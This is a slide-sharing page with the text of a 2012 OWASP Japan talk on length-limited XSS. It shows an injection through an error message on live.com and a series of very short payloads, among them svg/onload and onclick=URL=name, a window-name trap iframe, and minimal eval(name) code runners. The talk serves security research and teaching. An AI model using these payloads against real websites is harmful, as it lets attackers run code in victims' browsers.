Short talk of XSS - 短いXSSの話 -

3.6K Views

June 27, 12

#security #xss #owasp #XSS #OWASP #JavaScript #Security #Yosuke HASEGAWA

スライド概要

OWSP Japan 2nd Local Chapter Meeting資料

profile-image
スライド一覧

https://utf-8.jp/

シェア

またはPlayer版

埋め込む »CMSなどでJSが使えない場合

ダウンロード

ダウンロード(pdf - 1.3MB)

関連スライド

slide-thumbnail

CVSSとその限界
security 脆弱性
user-img はせがわようすけ 78.1K
slide-thumbnail

「脆弱性」「脅威」「リスク」の再整理
security 脅威モデリング
user-img はせがわようすけ 34K
slide-thumbnail

セキュリティにおける倫理って何だ?
security
user-img はせがわようすけ 28.5K
slide-thumbnail

Node.jsの色々
owaspsendai nodejs security javascript
user-img はせがわようすけ 21.6K
slide-thumbnail

JavaScript難読化読経
security javascript seccamp obfuscation
user-img はせがわようすけ 16.4K
slide-thumbnail

CSPを無意味にする残念なServiceWorker
security shibuyaxss javascript xss
user-img はせがわようすけ 11.2K
各ページのテキスト
1.

Short talk of XSS 短いXSSの話 Jun 27 2012 Yosuke HASEGAWA OWASP Japan 2nd local chapter meeting

2.

3.

4.

5.

6.

7.

What!?

8.
[beta] 
https://*.live.com/?param=><h1>XSSed</h1><!-<!-- Version: "13.000.20177.00" Server:
BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 -->
<input type="hidden" value="MESSAGE: A
potentially dangerous Request.QueryString value
was detected from the client
(param="><h1>XSSed</h1><!--").
SOURCE: System.Web FORM:" />

XSS caused by error message
9.

Microsoft “live.com” Over https Needless error message Interesting but not really matter now

10.

11.

alert is common knowledge for XSSers

12.

13.
[beta] 
https://*.live.com/?param=><h1>XSSed</h1><!-<!-- Version: "13.000.20177.00" Server:
BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 -->
<input type="hidden" value="MESSAGE: A
potentially dangerous Request.QueryString value
was detected from the client
><h1>XSSed</h1><!-(param="><h1>XSSed</h1><!--").
SOURCE: System.Web FORM:" />

22 letters max.
14.

XSS under 22 letters is too hard ><h1>XSSed</h1><!-- … 19 letters ><script>alert(1)</script> … 26 letters ><script>eval(name)</script> … 28 letters

15.

16.

by Gareth Heyes

17.

XSS Golf by Gareth Heyes

18.

Shortest XSS Challanges 19 letters <x/x=&{eval(name)}; // @0x6D6172696F Netscape 4 22 letters <svg/onload=eval(name) // @0x6D6172696F

19.

20.
[beta] 
https://*.live.com/?param=><h1>XSSed</h1><!-<!-- Version: "13.000.20177.00" Server:
BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 -->
<input type="hidden" value="MESSAGE: A
potentially dangerous Request.QueryString value
was detected from the client
><h1>XSSed</h1><!-(param="><h1>XSSed</h1><!--").
SOURCE: System.Web FORM:" />

22 letters max.
21.

22.

IE has “URL” property ><i/onclick=URL=name> … 21 letters Mario Heiderich’s work // Trap page created by attacker <iframe src="target" name="javascript:alert(1)"> // or use window.open from JavaScript

23.

Did it! XSS Filter is disabled

24.

Variations 20 letters <input type=hidden value=><i/onclick=URL=name> 22 letters <input type=hidden value=""><i/onclick=URL=name>"> 17 letters <input type=text value= onclick=URL=name> Run arbitrary code in 22 letters

25.

Shortest JavaScript to run arbitrary code 10 letters eval(name) 9 letters eval(URL) 8 letters URL=name 6 letters $(URL)

26.

Question? [email protected] [email protected] @hasegawayosuke http://utf-8.jp/ OWASP Japan 2nd local chapter meeting NetAgent http://www.netagent.co.jp/

27.